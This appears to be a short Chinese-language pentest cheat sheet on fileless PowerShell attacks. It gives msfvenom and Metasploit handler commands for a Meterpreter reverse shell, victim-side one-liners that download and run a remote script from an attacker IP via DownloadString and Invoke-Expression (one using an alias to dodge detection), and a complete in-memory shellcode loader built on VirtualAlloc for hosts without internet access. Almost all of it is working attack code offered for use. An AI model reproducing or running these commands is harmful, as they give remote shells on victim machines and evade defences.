powershell无文件

目标出网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 攻击机
# msf生成powershell脚本
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 --arch x64 --platform windows -f psh-reflection -o test.ps1

# python监听http
python -m SimpleHTTPServer

# msf监听
use multi/handler
set payload windows/x64/shell/reverse_tcp
set lhost 170.170.64.17
run

# 受害机执行
powershell Invoke-Expression(New-Object Net.WebClient).DownloadString('http://170.170.64.17:8000/calc.ps1')

powershell set-alias -name xxx -value Invoke-Expression;xxx(New-Object Net.WebClient).DownloadString('http://170.170.64.17:8000/test.ps1')

目标不出网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# readbytes.ps1

[Byte[]]$bytes = [System.IO.File]::ReadAllBytes($args[0])
$s = ""

for ($x = 0; $x -lt $bytes.Count; $x++) {
$s += $bytes[$x]
$s += ","
}

$s

# 从bin文件中读取字节数组,并替换文中的字节数组
readbytes.ps1 .\payload.bin



powershell $string={Set-StrictMode -Version 2;function func_get_proc_address {Param ($var_module, $var_procedure);$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() ^| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods');$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'));return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))};function func_get_delegate_type {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $var_return_type = [Void]);$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed');$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed');return $var_type_builder.CreateType()};If ([IntPtr]::size -eq 8) {[Byte[]]$var_code =99,97,108,99;for ($x = 0; $x -lt $var_code.Count; $x++) {$var_code[$x] = $var_code[$x] -bxor 26;};$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])));$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40);[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length);$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])));$var_runme.Invoke([IntPtr]::Zero)}}.ToString();iex $string